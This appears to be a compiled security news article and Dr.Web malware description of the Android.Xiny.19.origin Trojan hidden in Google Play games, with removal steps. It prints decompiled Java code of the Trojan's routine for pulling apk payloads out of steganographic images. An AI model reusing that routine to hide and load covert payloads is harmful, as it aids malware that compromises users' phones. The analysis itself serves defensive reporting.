Share

tweet





Doctor Web security researchers detected the Android.Xiny.19.origin Trojan that targeted dozens of games published on the Google Play store. The Trojan is designed to download, install, and run programs upon receiving a command from cybercriminals. Besides, it can display annoying advertisements.

Bad news for Android users, according to the security Doctor Web firm dozens of game apps in the Google Play Store have been infected with the Android.Xiny.19.origin Trojan. The malware could allow attackers to control the victim’s mobile device, by installing and running any kind of software (apk files), it also allows to display annoying advertisements.

However, the main threat of Android.Xiny.19.origin lies in its capability to download and dynamically run arbitrary apk files upon cybercriminals’ command. However, the way it is carried out is rather unique. To masquerade the malicious program, virus makers hide it in specially created images by applying steganography. Unlike cryptography that is used for encryption of source information, which may arouse suspicion, steganography is applied to hide information covertly. Virus makers presumably decided to complicate the detection procedure expecting that security analysts would not pay attention to benign images.

The malware collects information from the infected device and sends them back to the command and control server, it gathers the IMEI identifier, the MAC address, version and language of the operating system and the mobile network operator’s name.

The Trojan was incorporated into more than 60 games that were then distributed via Google Play in the names of more than 30 game developers, including Conexagon Studio, Fun Color Games, BILLAPPS, and many others. Although Doctor Web has already informed Google about this incident, to this day, the affected applications are still available on Google Play. It is recommended that you do not download games from the store to devices without anti-virus software in the next few hours.

Another interesting feature implemented by the authors of Android.Xiny is that the malware hides malicious program in specially created images by using steganography. Android.Xiny receives malicious images from the server and then retrieves the apk they contain.

The Android.Xiny malware is able to perform many other malicious operations without the user’s consent. The researchers noticed that despite it is not yet able to gain root privileges, it has the ability to download the proper exploit in order to gain root access to the device.

Unfortunately, the fact that the malware author chose the Google Play to distribute the malware is not a novelty, in January Lookout firm discovered 13 Android apps infected with the Brain Test malware and available for download on the official Google Store.

Android.Xiny.19.origin – sends the following information on the affected device to the server: its IMEI identifier and MAC address, a version and a current language of the operating system, and mobile network operator name. What is more, cybercriminals get information about accessibility of a memory card, name of an application, which the Trojan is incorporated into, and whether this application is in the system folder.

Upon receiving a necessary image from the server, Android.Xiny.19.origin retrieves a hidden apk file with the help of a special algorithm and then executes it.

Android.Xiny.19.origin – can perform other malicious functions, such as to download and prompt a user to install different software, or to install and delete applications without the user’s knowledge if root access is available on the device. Besides, the malicious program can display annoying advertisements.

Android.Xiny.19.origin – is not yet able to gain root privileges. However, given that the Trojan is mainly designed to install software, it can download a set of exploits from the server in order to gain root access to the device for covert installation or deletion of applications.

Doctor Web security researchers would like to warn users against installing dubious applications even if they are published on Google Play. Dr.Web for Android successfully detects all the known applications containing Android.Xiny.19.origin, so they do not pose any threat to our users.

The Trojan Android.Xiny.19.origin

Added to Dr.Web virus database: 2016-01-29

Virus description was added: 2016-01-29

It is a Trojan for Android devices that is embedded into various games published on Google Play.

Android.Xiny.19.origin sends the following information to the command and control server:

IMEI identifier

IMSI identifier

Information about the mobile operator

Presence of a memory card in a device

Country

Language

MAC address

Version of the operating system

Package name and a version of an application that the Trojan is incorporated into

Presence of the malicious application in the system folder

The Trojan can execute the following actions:

Displays annoying advertisements

Downloads applications and prompts a user to install various software

Installs and deletes programs if root access is available on a device

Launches arbitrary apk files hidden in images received from the C&C server

The way apk files are launched looks as follows: Android.Xiny.19.origin downloads a specially created image, which contains the corresponding file object hidden with the help of steganography, from the server. Then the Trojan retrieves the apk file using a special algorithm:

Code Expand source

package com.wch.c_direct.encrypt.logic;

import android.graphics.Bitmap;

import android.graphics.BitmapFactory;

import com.wch.c_direct.logic.a;

import java.io.InputStream;

import java.util.Arrays;

public final class BitmapDecryptor {

public static byte[] decrypt(InputStream inputStream) {

int i5;

int i = 4;

int i1 = 8;

a.a();

Bitmap bitmap0 = BitmapFactory.decodeStream(inputStream);

bitmap0.setHasAlpha(true);

byte[] buffer1 = new byte[i1];

int i2 = 0;

int i3 = 0;

int i4 = 0;

while(i2 < buffer1.length) { i5 = bitmap0.getPixel(i4, i3); buffer1[i2] = ((byte)(i5 >> 16 & 15));

if(i2 + 1 < i1) { buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));

}

if(i2 + 2 < i1) {

buffer1[i2 + 2] = ((byte)(i5 & 15));

}

++i4;

if(i4 == bitmap0.getWidth()) {

++i3;

i4 = 0;

}

i2 += 3;

}

byte[] buffer2 = BitmapDecryptor.a(buffer1);

i2 = 0;

i3 = 0;

while(i2 < i) {

i3 = i3 << 8 | buffer2[i2] & 255;

++i2;

}

buffer1 = new byte[i3 * 8 / 4];

i2 = 0;

i3 = 0;

i4 = 0;

while(i2 < buffer1.length) { i5 = bitmap0.getPixel(i4, i3); buffer1[i2] = ((byte)(i5 >> 16 & 15));

if(i2 + 1 < buffer1.length) { buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));

}

if(i2 + 2 < buffer1.length) {

buffer1[i2 + 2] = ((byte)(i5 & 15));

}

++i4;

if(i4 == bitmap0.getWidth()) {

++i3;

i4 = 0;

}

i2 += 3;

}

byte[] decrypted = BitmapDecryptor.a(buffer1);

bitmap0.recycle();

return Arrays.copyOfRange(decrypted, i, decrypted.length);

}

private static byte[] a(byte[] inBuffer) {

a.a();

byte[] outBuffer = new byte[inBuffer.length / 2];

int i;

for(i = 0; i < outBuffer.length; ++i) {

int i1;

for(i1 = 0; i1 < 2; ++i1) {

outBuffer[i] = ((byte)(outBuffer[i] << 4 | inBuffer[i * 8 / 4 + i1]));

}

}

return outBuffer;

}

}

After that, the malicious application loads the file into RAM of the infected device using the DexClassLoader class.

How to Detect & Remove Android.Xiny Trojan from Android Phone

Google is surely going to remove these malicious apps soon from the Play Store, but if you have already installed any one of these apps, you can detect and remove this Android.Xiny malware from your phone this way:

1. Download and install Dr.Web Antivirus Light on your Android phone.



2. Launch Dr.Web Antivirus and update the virus definitions. Then tap on the Scanner button.

3. Choose Full scan to scan everything on the internal as well as external memory cards.



4. The scan may take a long time to finish if you have a lot of files on your memory cards. During the scan, it may make audible alerts when it detects the malware. After the scan is complete, it will show you if Android.Xiny trojan is detected.Remove Android.Xiny.19.origin Trojan



5. Touch the ellipsis against each of the trojan infested file and choose to Delete these files.



Android.Xiny trojan is a very dangerous malware as it can download APK files hidden inside image files (using some of the basic steganography techniques). Many of the antivirus apps do not scan the image files thinking them as harmless and this way it has evaded detection so far. This trojan can also receive instructions from command and control center being run by cyber-criminals remotely. This is why it is important that you scan and remove this Android.Xiny trojan from your and your friends’ phones.

Sources:

drweb.com

securityaffairs.co

www.trishtech.com